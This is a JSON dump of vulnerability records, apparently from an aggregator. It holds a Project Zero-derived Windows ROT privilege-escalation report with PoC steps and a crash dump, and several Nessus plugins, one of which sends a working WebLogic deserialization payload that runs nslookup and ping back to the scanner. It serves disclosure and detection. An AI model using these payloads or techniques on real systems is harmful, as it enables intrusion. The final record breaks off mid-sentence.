{"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-05T05:13:31", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2017-05-17T00:00:00", "published": "2017-05-17T00:00:00", "href": "https://0day.today/exploit/description/27797", "id": "1337DAY-ID-27797", "type": "zdt", "title": "Microsoft Windows - Running Object Table Register ROTFLAGS_ALLOWANYCLIENT Privilege Escalation Explo", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1112\r\n \r\nWindows: Running Object Table Register ROTFLAGS_ALLOWANYCLIENT EoP\r\nPlatform: Windows 10 10586/14393 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n \r\nSummary:\r\nBy setting an appropriate AppID it\u2019s possible for a normal user process to set a global ROT entry. This can be abused to elevate privileges.\r\n \r\nDescription:\r\n \r\nNOTE: I\u2019m not sure which part of this chain to really report. As far as I can tell it\u2019s pretty much all by design and fixing the initial vector seems difficult. Perhaps this is only a bug which can be fixed to prevent sandbox escapes?\r\n \r\nWhen registering an object in the ROT the default is to only expose that registration to the same user identity on the same desktop/window station. This includes preventing the same user at different ILs (such as between sandbox and normal user) from seeing the same registration. However it could be imagined that you might want to register an entry for all users/contexts so IRunningObjectTable::Register takes a grfFlags parameter with the value ROTFLAGS_ALLOWANYCLIENT which allows the ROT entry to be exposed to all users. \r\n \r\nThe description of this flag indicates it can only be used if the COM process is a Local Service or a RunAs application. In fact there\u2019s an explicit ROTFlags value for the AppID which would grant the privilege to a normal application. Quick testing proves this to be correct, a \u201cnormal\u201d application cannot expose the ROT entry to any client as RPCSS does a check that the calling process is allowed to expose the entry. However there are two clear problems with the check. Creating a RunAs COM object in the current session would typically run at the same privilege level as the caller, therefore an application which wanted to abuse this feature could inject code into that process. Secondly while it\u2019s not possible to register a per-user COM object which specifies a RunAs AppID it\u2019s possible to explicitly set the AppID when calling CoInitializeSecurity (either via the GUID or by naming your program to match one which maps to the correct AppID).\r\n \r\nTherefore in the current implementation effectively any process, including sandboxed ones should be able to register a global ROT entry. What can we do with this? The ROT is mainly used for OLE duties, for example Word and Visual Studio register entries for each document/project open. It would be nice not to rely on this, so instead I\u2019ll abuse another OLE component, which we\u2019ve seen before, the fact that LoadTypeLib will fall back to a moniker if it can\u2019t find the type library file specified.\r\n \r\nIf the file loading fails then LoadTypeLib will effectively call MkParseDisplayName on the passed in string. One of the things MPDN does is try and create a file moniker with the string passed in as an argument. File Monikers have an interesting feature, the COM libraries will check if there\u2019s a registered ROT entry for this file moniker already present, if it is instead of creating a new object it will call IRunningObjectTable::GetObject instead when binding. So as we can register a ROT entry for any user in any context we can provide our own implementation of ITypeLib running inside our process, by registering it against the path to the type library any other process which tries to open that library would instead get our spoofed one, assuming we can force the file open to fail.\r\n \r\nThis is the next key part, looking at the LoadTypeLib implementation the code calls FindTypeLib if this function fails the code will fall back to the moniker route. There\u2019s two opportunities here, firstly CreateFile is called on the path, we could cause this to fail by opening the file with no sharing mode, in theory it should fail. However in practice it doesn\u2019t most type libraries are in system location, if you don\u2019t have the possibility of write permission on the file the OS automatically applies FILE_SHARE_READ which makes it impossible to lock the file in its entirety. Also some TLBs are stored inside a DLL which is then used so this route is out. Instead the other route is more promising, VerifyIsExeOrTlb is called once the file is open to check the type of file to parse. This function tries to load the first 64 bytes and checks for magic signatures. We can cause the read to fail by using the LockFile API to put an exclusive lock on that part of the file. This also has the advantage that it doesn\u2019t affect file mappings so will also work with loaded DLLs. \r\n \r\nWe now can cause any user of a type library to get redirected to our \u201cfake\u201d one without abusing impersonation/symbolic link tricks. How can we use this to our advantage? The final trick is to abuse again the auto-generation of Stubs/Proxies from automation compatible interfaces. If we can get a more privileged process to use our type library when creating a COM stub we can cause a number of memory safety issues such as type confusion, arbitrary memory read/writes and extending the vtable to call arbitrary functions. This is an extremely powerful primitive, as long as you can find a more privileged process which uses a dual automation interface. For example the FlashBroker which is installed on every Win8+ machine is intentionally allowed to be created by sandboxed IE/Edge and uses dual interfaces with auto-generated Stubs. We could abuse for example the BrokerPrefSetExceptionDialogSize and BrokerPrefGetExceptionDialogSize to do arbitrary memory writes. This all works because the stub creation has no was of ensuring that the actual server implementation matches the generated stub (at least without full symbols) so it will blindly marshal pointers or call outside of the object's vtable.\r\n \r\nProof of Concept:\r\n \r\nI\u2019ve provided a PoC as a C# project. You need to compile it first. It fakes out the Windows Search Service\u2019s type library to modify the IGatherManagerAdmin2::GetBackoffReason method so that instead of marshaling a pointer to an integer for returning the caller can specify an arbitrary pointer value. When the method on the server side completes it will try and write a value to this address which will cause a Write AV. The Windows Search service would be ideal for abuse but many of the functions seem to require Administrator access to call. That\u2019s not to say you couldn\u2019t convert this into a full working exploit but I didn\u2019t.\r\n \r\n1) Compile the C# project. It should be compiled as a 64 bit executable.\r\n2) Restart the Windows Search service just to ensure it hasn\u2019t cached the stub previously. This probably isn\u2019t necessary but just to be certain.\r\n3) Attach a debugger to SearchIndexer.exe to catch the crash.\r\n4) Execute the PoC as a normal user (do not run under the VSHOST as the CoInitializeSecurity call will fail). You need to pass the path to the provided mssitlb.tlb file which has been modified appropriately.\r\n5) The service should crash trying to write a value to address 0x12345678\r\n \r\nCrash Dump:\r\n \r\n0:234> r\r\nrax=0000015ee04665a0 rbx=0000015ee0466658 rcx=0000015ee0466658\r\nrdx=0000000000000000 rsi=0000000000000004 rdi=0000000000000000\r\nrip=00007fff80e3a75d rsp=00000036541fdae0 rbp=00000036541fdb20\r\n r8=00000036541fd868 r9=0000015ee3bb50b0 r10=0000000000000000\r\nr11=0000000000000246 r12=0000015ee3c02988 r13=00000036541fe1c0\r\nr14=0000000012345678 r15=0000000000000000\r\niopl=0 nv up ei pl zr na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\nMSSRCH!CGatheringManager::GetBackoffReason+0x8d:\r\n00007fff`80e3a75d 418936 mov dword ptr [r14],esi ds:00000000`12345678=????????\r\n0:234> k\r\n # Child-SP RetAddr Call Site\r\n00 00000036`541fdae0 00007fff`b416d533 MSSRCH!CGatheringManager::GetBackoffReason+0x8d\r\n01 00000036`541fdb10 00007fff`b413b0d0 RPCRT4!Invoke+0x73\r\n02 00000036`541fdb60 00007fff`b2fa479a RPCRT4!NdrStubCall2+0x430\r\n03 00000036`541fe180 00007fff`b3853c93 combase!CStdStubBuffer_Invoke+0x9a [d:\\th\\com\\combase\\ndr\\ndrole\\stub.cxx @ 1446]\r\n04 00000036`541fe1c0 00007fff`b305ccf2 OLEAUT32!CUnivStubWrapper::Invoke+0x53\r\n05 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing::__l7::<lambda_b8ffcec6d47a5635f374132234a8dd15>::operator()+0x42 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1805]\r\n06 00000036`541fe210 00007fff`b3001885 combase!ObjectMethodExceptionHandlingAction<<lambda_b8ffcec6d47a5635f374132234a8dd15> >+0x72 [d:\\th\\com\\combase\\dcomrem\\excepn.hxx @ 91]\r\n07 (Inline Function) --------`-------- combase!InvokeStubWithExceptionPolicyAndTracing+0x9e [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1808]\r\n08 00000036`541fe280 00007fff`b3006194 combase!DefaultStubInvoke+0x275 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1880]\r\n09 (Inline Function) --------`-------- combase!SyncStubCall::Invoke+0x1b [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1934]\r\n0a (Inline Function) --------`-------- combase!SyncServerCall::StubInvoke+0x1b [d:\\th\\com\\combase\\dcomrem\\servercall.hpp @ 736]\r\n0b (Inline Function) --------`-------- combase!StubInvoke+0x297 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2154]\r\n0c 00000036`541fe4a0 00007fff`b3008b47 combase!ServerCall::ContextInvoke+0x464 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1568]\r\n0d (Inline Function) --------`-------- combase!CServerChannel::ContextInvoke+0x83 [d:\\th\\com\\combase\\dcomrem\\ctxchnl.cxx @ 1458]\r\n0e (Inline Function) --------`-------- combase!DefaultInvokeInApartment+0x9e [d:\\th\\com\\combase\\dcomrem\\callctrl.cxx @ 3438]\r\n0f 00000036`541fe770 00007fff`b3007ccd combase!AppInvoke+0x8a7 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 1618]\r\n10 00000036`541fe8a0 00007fff`b300b654 combase!ComInvokeWithLockAndIPID+0xb2d [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 2686]\r\n11 00000036`541feb30 00007fff`b40fd433 combase!ThreadInvoke+0x1724 [d:\\th\\com\\combase\\dcomrem\\channelb.cxx @ 6954]\r\n12 00000036`541fedc0 00007fff`b40fbed8 RPCRT4!DispatchToStubInCNoAvrf+0x33\r\n13 00000036`541fee10 00007fff`b40fcf04 RPCRT4!RPC_INTERFACE::DispatchToStubWorker+0x288\r\n14 00000036`541fef10 00007fff`b40f922d RPCRT4!RPC_INTERFACE::DispatchToStubWithObject+0x404\r\n15 00000036`541fefb0 00007fff`b40f9da9 RPCRT4!LRPC_SCALL::DispatchRequest+0x35d\r\n16 00000036`541ff090 00007fff`b40f64dc RPCRT4!LRPC_SCALL::HandleRequest+0x829\r\n17 00000036`541ff180 00007fff`b40f48c9 RPCRT4!LRPC_SASSOCIATION::HandleRequest+0x45c\r\n18 00000036`541ff200 00007fff`b411eaca RPCRT4!LRPC_ADDRESS::ProcessIO+0xb29\r\n19 00000036`541ff350 00007fff`b422e490 RPCRT4!LrpcIoComplete+0x10a\r\n1a 00000036`541ff3f0 00007fff`b422bc66 ntdll!TppAlpcpExecuteCallback+0x360\r\n1b 00000036`541ff4a0 00007fff`b34b8102 ntdll!TppWorkerThread+0x916\r\n1c 00000036`541ff8b0 00007fff`b425c5b4 KERNEL32!BaseThreadInitThunk+0x22\r\n1d 00000036`541ff8e0 00000000`00000000 ntdll!RtlUserThreadStart+0x34\r\n \r\nExpected Result:\r\nNot doing what ever it did.\r\n \r\nObserved Result:\r\nIt did it!\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42021.zip\n\n# 0day.today [2018-01-05] #", "sourceHref": "https://0day.today/exploit/27797", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-05T10:15:57", "bulletinFamily": "scanner", "description": "The version of Apache ActiveMQ running on the remote host is 5.x prior\nto 5.15.5. It is, therefore, affected by multiple vulnerabilities.", "modified": "2019-11-02T00:00:00", "id": "ACTIVEMQ_5_15_5.NASL", "href": "https://www.tenable.com/plugins/nessus/112192", "published": "2018-08-30T00:00:00", "title": "Apache ActiveMQ 5.x < 5.15.5 Multiple Vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(112192);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2012-0881\",\n \"CVE-2014-0114\",\n \"CVE-2015-5182\",\n \"CVE-2016-3092\",\n \"CVE-2016-5425\",\n \"CVE-2016-6325\",\n \"CVE-2016-8735\",\n \"CVE-2018-7489\",\n \"CVE-2018-8006\"\n );\n script_bugtraq_id(\n 67121,\n 68753,\n 91453,\n 93472,\n 93478,\n 94463,\n 103203,\n 105156\n );\n\n script_name(english:\"Apache ActiveMQ 5.x < 5.15.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of ActiveMQ.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host is affected by multiple\n vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache ActiveMQ running on the remote host is 5.x prior\nto 5.15.5. It is, therefore, affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://activemq.apache.org/activemq-5155-release.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache ActiveMQ version 5.15.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-7489\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts ClassLoader Manipulation Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/08/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:activemq\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"activemq_web_console_detect.nasl\");\n script_require_keys(\"installed_sw/ActiveMQ\");\n script_require_ports(\"Services/www\", 8161);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\napp = 'ActiveMQ';\nget_install_count(app_name:app, exit_if_zero:TRUE);\n\nport = get_http_port(default:8161);\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nconstraints = [\n { \"min_version\" : \"5.0.0\", \"max_version\" : \"5.15.4\", \"fixed_version\" : \"5.15.5\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags:{xss:TRUE, xsrf:TRUE});\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-09T11:17:28", "bulletinFamily": "scanner", "description": "The version of Oracle WebCenter Sites running on the remote host is\naffected by an unspecified flaw in the Sites component (formerly\nFatWire Content Server) that allows an remote attacker to impact\nconfidentiality and integrity. Note that this issue only applies\nto versions 11.1.1.8.0, 12.2.1.2.0,and 12.2.1.3.0.", "modified": "2019-11-02T00:00:00", "id": "ORACLE_WEBCENTER_SITES_APR_2018_CPU.NASL", "href": "https://www.tenable.com/plugins/nessus/109209", "published": "2018-04-20T00:00:00", "title": "Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109209);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2016-3092\", \"CVE-2017-12617\", \"CVE-2018-2791\");\n script_bugtraq_id(91453, 100954, 103800);\n\n script_name(english:\"Oracle WebCenter Sites Remote Vulnerability (April 2018 CPU)\");\n script_summary(english:\"Checks the version of Oracle WebCenter Sites.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote host is affected by a remote\nsecurity vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle WebCenter Sites running on the remote host is\naffected by an unspecified flaw in the Sites component (formerly\nFatWire Content Server) that allows an remote attacker to impact\nconfidentiality and integrity. Note that this issue only applies\nto versions 11.1.1.8.0, 12.2.1.2.0,and 12.2.1.3.0.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4e39ef65\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2018 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-12617\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Tomcat for Windows HTTP PUT Method File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Tomcat RCE via JSP Upload Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:fusion_middleware\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_webcenter_sites_installed.nbin\");\n script_require_keys(\"SMB/WebCenter_Sites/Installed\");\n script_require_ports(\"Services/www\", 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\n\nport = kb_smb_transport();\n\nget_kb_item_or_exit('SMB/WebCenter_Sites/Installed');\n\nversions = get_kb_list('SMB/WebCenter_Sites/*/Version');\nif (isnull(versions)) exit(1, 'Unable to obtain a version list for Oracle WebCenter Sites.');\n\nreport = '';\n\nforeach key (keys(versions))\n{\n fix = '';\n\n version = versions[key];\n revision = get_kb_item(key - '/Version' + '/Revision');\n path = get_kb_item(key - '/Version' + '/Path');\n\n if (isnull(version) || isnull(revision)) continue;\n\n # Patch 27589552 - 11.1.1.8.0 < Revision 184362 \n if (version =~ \"^11\\.1\\.1\\.8\\.0$\" && revision < 184362)\n fix = '\\n Fixed revision : 184362' +\n '\\n Required patch : 27589552';\n\n# Pending 12.x Fusion Middleware and WebCenter Sites detection fixes\n#\n# # Patch 25806943 - 12.2.1.1.0 < Revision 170415\n# if (version =~ \"^12\\.2\\.1\\.1\\.0$\" && revision < 170415)\n# fix = '\\n Fixed revision : 170415' +\n# '\\n Required patch : 25806943';\n#\n# # Patch 25806946 - 12.2.1.2.0 < Revision 170415\n# if (version =~ \"^12\\.2\\.1\\.2\\.0$\" && revision < 170415)\n# fix = '\\n Fixed revision : 170415' +\n# '\\n Required patch : 25806946';\n#\n if (fix != '')\n {\n if (!isnull(path)) report += '\\n Path : ' + path;\n report += '\\n Version : ' + version +\n '\\n Revision : ' + revision +\n fix + '\\n';\n }\n}\n\nif (report != '') security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\nelse audit(AUDIT_INST_VER_NOT_VULN, \"Oracle WebCenter Sites\");\n\n\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-11-09T12:01:23", "bulletinFamily": "scanner", "description": "The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.", "modified": "2019-11-02T00:00:00", "id": "WEBLOGIC_2017_10271.NASL", "href": "https://www.tenable.com/plugins/nessus/105484", "published": "2017-12-28T00:00:00", "title": "Oracle WebLogic WSAT Remote Code Execution", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105484);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2019/11/08\");\n\n script_cve_id(\"CVE-2017-10271\");\n\n script_name(english:\"Oracle WebLogic WSAT Remote Code Execution\");\n script_summary(english:\"Sends an HTTP POST request and looks for DNS response\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle WebLogic server is affected by a remote code\nexecution vulnerability in the WSAT endpoint due to unsafe\ndeserialization of XML encoded Java objects. An unauthenticated,\nremote attacker can exploit this, via a crafted Java object, \nto execute arbitrary Java code in the context of the WebLogic\nserver.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html#AppendixFMW\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b680917f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the October 2017 Oracle\nCritical Patch Update advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-10271\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Oracle WebLogic wls-wsat Component Deserialization RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:weblogic_server\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"weblogic_detect.nasl\");\n script_require_keys(\"www/weblogic\");\n script_require_ports(\"Services/www\", 80, 7001);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\n\nappname = \"Oracle WebLogic Server\";\n\nget_kb_item_or_exit(\"www/weblogic\");\nport = get_http_port(default:7001, embedded:FALSE);\nget_kb_item_or_exit(\"www/weblogic/\" + port + \"/installed\");\n\n# establish if WSAT is enabled. If it isn't then we don't\n# need to proceed any futher\nres = http_send_recv3(\n method:'GET',\n item:'/wls-wsat/CoordinatorPortType',\n port:port,\n exit_on_fail:TRUE);\nif (empty_or_null(res) || '404' >< res[0])\n{\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# generate a unique pattern for each execution. unixtime() is not\n# granular enough since there may be many installs and this script\n# could be running in parallel\npattern = hexstr(rand_str(length:8));\n\n# create the HTTP request that will execute the DNS lookup. We'll try to execute\n# via both cmd and sh since we have no real insight into the remote OS.\n# Because some minimal Linux installs don't include nslookup, we'll also fallback\n# on using ping if necessary... although I think that is mostly paranoia.\nns_lookup = 'nslookup weblogic-2017-10271-' + pattern + ' ' + compat::this_host();\nxml_encoded_java =\n'<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">' +\n '<soapenv:Header>' +\n '<work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">' +\n '<java>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>cmd.exe</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>/c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>' + ns_lookup + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '<void class=\"java.lang.ProcessBuilder\">' +\n '<array class=\"java.lang.String\" length=\"3\" >' +\n '<void index=\"0\">' +\n '<string>/bin/sh</string>' +\n '</void>' +\n '<void index=\"1\">' +\n '<string>-c</string>' +\n '</void>' +\n '<void index=\"2\">' +\n '<string>ping -c 10 -p ' + pattern + ' ' + compat::this_host() + '</string>' +\n '</void>' +\n '</array>' +\n '<void method=\"start\"/>' +\n '</void>' +\n '</java>' +\n '</work:WorkContext>' +\n '</soapenv:Header>' +\n '<soapenv:Body/>' +\n'</soapenv:Envelope>';\nrequest =\n 'POST /wls-wsat/CoordinatorPortType HTTP/1.1\\r\\n' +\n 'Host: ' + get_host_ip() + ':' + port + '\\r\\n' +\n 'Content-Type: text/xml\\r\\n' +\n 'Content-Length: ' + len(xml_encoded_java) + '\\r\\n' +\n '\\r\\n' +\n xml_encoded_java;\n\nsoc = open_sock_tcp(port);\nif (!soc)\n{\n audit(AUDIT_SOCK_FAIL, port, appname);\n}\n\nfilter = \"(ip and udp and port 53 and src host \" + get_host_ip() + \") or (icmp and icmp[0] = 8 and src host \" + get_host_ip() + \")\";\nresponse = send_capture(socket:soc, data:request, pcap_filter:filter);\nclose(soc);\n\nif (empty_or_null(response))\n{\n # looks like we didn't execute anything on the host\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n}\n\n# We can directly search the DNS response\nif (pattern >!< response)\n{\n # maybe this is an ICMP response?\n icmp_data = tolower(hexstr(get_icmp_element(icmp:response, element:\"data\")));\n if (empty_or_null(icmp_data))\n {\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n }\n\n if (pattern >!< icmp_data)\n {\n # couldn't find the pattern in the ICMP data\n audit(AUDIT_INST_VER_NOT_VULN, appname);\n } \n}\n\nreport =\n '\\nNessus was able to exploit a Java deserialization vulnerability by' +\n '\\nsending a crafted Java object.' +\n '\\n';\nsecurity_report_v4(port:port, severity:SECURITY_WARNING, extra:report);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-11-01T02:11:42", "bulletinFamily": "scanner", "description": "An update for gstreamer1-plugins-bad-free is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGStreamer is a streaming media framework based on graphs of filters\nwhich operate on media data. The gstreamer1-plugins-bad-free package\ncontains a collection of plug-ins for GStreamer.\n\nSecurity Fix(es) :\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in GStreamer", "modified": "2019-11-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0021.NASL", "href": "https://www.tenable.com/plugins/nessus/101404", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : gstreamer1-plugins-bad-free / etc (VZLSA-2017-0021)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101404);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-9445\",\n \"CVE-2016-9809\",\n \"CVE-2016-9812\",\n \"CVE-2016-9813\"\n );\n\n script_name(english:\"Virtuozzo 7 : gstreamer1-plugins-bad-free / etc (VZLSA-2017-0021)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for gstreamer1-plugins-bad-free is now available for Red Hat\nEnterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGStreamer is a streaming media framework based on graphs of filters\nwhich operate on media data. The gstreamer1-plugins-bad-free package\ncontains a collection of plug-ins for GStreamer.\n\nSecurity Fix(es) :\n\n* An integer overflow flaw, leading to a heap-based buffer overflow,\nwas found in GStreamer's VMware VMnc video file format decoding\nplug-in. A remote attacker could use this flaw to cause an application\nusing GStreamer to crash or, potentially, execute arbitrary code with\nthe privileges of the user running the application. (CVE-2016-9445)\n\n* Multiple flaws were discovered in GStreamer's 